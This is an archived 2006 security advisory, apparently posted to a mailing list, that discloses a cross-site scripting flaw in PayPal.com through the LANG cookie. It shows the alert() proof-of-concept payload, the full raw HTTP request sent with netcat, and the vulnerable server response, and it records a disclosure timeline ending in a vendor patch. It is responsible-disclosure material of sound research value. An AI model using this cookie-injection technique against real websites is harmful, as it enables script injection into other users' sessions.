<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7651.51">
<TITLE>[x0n3-h4ck.org] PayPal vulnerable to XSS</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>
<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
<BR>
PayPal.com<BR>
<BR>
Author:CorryL x0n3-h4ck.org<BR>
-=[----------------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application: PayPal.com<BR>
-=[+] Version: <BR>
-=[+] Vendor's URL: www.paypal.com<BR>
-=[+] Platform: Linux\Unix<BR>
-=[+] Bug type: XSS<BR>
-=[+] Exploitation: Remote/Local<BR>
-=[-]<BR>
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference: www.x0n3-h4ck.org<BR>
-=[+] Virtual Office: <A HREF="http://www.kasamba.com/CorryL">http://www.kasamba.com/CorryL</A><BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
Founded in 1998, PayPal, an eBay Company, enables any individual or business with an email address to securely, easily and quickly send and receive payments online. PayPal's service builds on the existing financial infrastructure of bank accounts and credit cards and utilizes the world's most advanced proprietary fraud prevention systems to create a safe, global, real-time payment solution.<BR>
<BR>
PayPal has quickly become a global leader in online payment solutions with 100 million account members worldwide. Available in 103 countries and regions around the world, buyers and sellers on eBay, online retailers, online businesses, as well as traditional offline businesses are transacting with PayPal.<BR>
<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
The problem is in a contained variable on the cookies that come<BR>
saved on a system client,<BR>
I have used a small software "NetCat" for the dispatch of the application<BR>
to the web containing server the lace,<BR>
what it would allow the xss.<BR>
<BR>
I have used a line of code that visualizes a small window of<BR>
containing alert of the numbers.<BR>
<BR>
<ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt><BR>
<BR>
I have passed to the varying LANG in this way:<BR>
<BR>
LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt><BR>
<BR>
this is a request, that I have passed server to the web, complete of the<BR>
code that would allow the xss:<BR>
<BR>
GET / HTTP/1.0<BR>
Accept: */*<BR>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR<BR>
1.1.4322)<BR>
Host: www.paypal.com<BR>
Cookie:<BR>
cookie_check=yes;feel_cookie=6120302020622030202063203620776562736372206<BR>
4203020206520323120686F6D65706167652F486F6D65506167652E78736C20662030202<BR>
067203520656E5F55532068203020206920313920702F77656C2F696E6465782D6F75747<BR>
3696465206A203020206B2031362057656C636F6D65202D2050617950616C206C2030202<BR>
0;Apache=87%2E18%2E96%2E17%2E100421159849159546;KHcl0EuY7AKSMgfvHl7J5E7h<BR>
PtK=3pnRPwTbH4N6EEpxzwWWs3Mc2y2H-hH53D2MVeXyVDl4MsVrDF4cjRE3XSmD3RB714PL<BR>
N69ovbjK--4R;HaC80bwXscjqZ7KM6VOxULOB534=111-222-1933email@address.com;p<BR>
pip_signup=1;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;7aMa<BR>
j2jiaNMgvUAKlwbL1LlbnqC=BCRwX6rFzy8UFpNf7im0msjTqBkC71Yeq3U8IKjQG4zGrhRy<BR>
i5YDJ7sCXUdmJRHDye3Pjm;fL2JBKjxujhcE4LvqIWvGu9H2DC=r-h3XHZ9sxeAYLHHkSjI4<BR>
rXDaIB_JYsnEcx5svkMqiEPXWXCIaM-O-gNRkcj1K4tS5pPr4xtYC_3hZUBCMQ6b4xw8Tm;t<BR>
est_cookie=CheckForPermission;HumanClickID=-1902375092086;HumanClickACTI<BR>
VE=1159849210089;HumanClickKEY=2113911440409354850;BEGINREJECT=115984951<BR>
1214ENDREJECT<BR>
Connection: Close<BR>
Pragma: no-cache<BR>
<BR>
following I glue the answer of the server:<BR>
<BR>
nc www.paypal.com 80 < prova.txt<BR>
<BR>
<BR>
HTTP/1.1 200 OK<BR>
Date: Fri, 06 Oct 2006 17:23:13 GMT<BR>
Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.22<BR>
OpenSSL/0.9.7e<BR>
Cache-Control: private<BR>
Expires: Thu, 05 Jan 1995 22:00:00 GMT<BR>
Pragma: no-cache<BR>
Set-Cookie:<BR>
feel_cookie=61203020206220302020632036207765627363722064203620776562<BR>
736372206520323120686F6D65706167652F486F6D65506167652E78736C20662032312<BR>
0686F6D65<BR>
706167652F486F6D65506167652E78736C2067203431202D2D3E3C536352695074200A0<BR>
D3E616C65<BR>
72742831323334353637383930293B3C2F5363526950743E2068203520656E5F5553206<BR>
920313920<BR>
702F77656C2F696E6465782D6F757473696465206A20313920702F77656C2F696E64657<BR>
82D6F7574<BR>
73696465206B203020206C2031362057656C636F6D65202D2050617950616C20;<BR>
expires=Sat, 0<BR>
6-Oct-2007 17:23:14 GMT; path=/; domain=.paypal.com<BR>
Set-Cookie: Apache=87.18.110.213.321561160155393836; path=/;<BR>
expires=Sun, 28-Sep<BR>
-36 17:23:13 GMT<BR>
Connection: close<BR>
Content-Type: text/html; charset=UTF-8<BR>
<BR>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><BR>
<html><BR>
<head><BR>
<!--<BR>
Script info: script: webscr, cmd: , template: p/wel/index-outside,<BR>
date: Oct.<BR>
3, 2006 12:18:04 PDT; country: US, language: --><ScRiPt>alert(1234567890);</ScRiPt><BR>
web version: 42.0-255538 branch: live-420_int<BR>
content version: 42.0-249796 branch: live-420_int<BR>
--><BR>
<title>PayPal - Abort</title><BR>
<BR>
As he is able well to see the server responds and it inserts the line of<BR>
code among the output of the page, allowing the opening<BR>
of the window of alert.<BR>
<BR>
<BR>
We can save the answer of the server on a page in formed html<BR>
and to open her/it with an any browsers to ascertain how much I dictate,<BR>
using same NetCat, in this way:<BR>
<BR>
nc www.paypal.com 80 < test.txt > aaa.html<BR>
<BR>
<BR>
<BR>
<BR>
..::[ Disclousure Timeline ]::..<BR>
<BR>
[04/10/2006] - Vendor notification<BR>
[08/10/2006] - Vendor Response<BR>
[18/10/2006] - Patch relase from vendor<BR>
[04/11/2006] - Public disclousure<BR>
<BR>
<BR>
<BR>
*********************<BR>
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!<BR>
Per maggiori informazioni vai su: <A HREF="http://adsl.alice.it/servizi/alicebasic.html">http://adsl.alice.it/servizi/alicebasic.html</A> </FONT>
</P>
</BODY>
</HTML>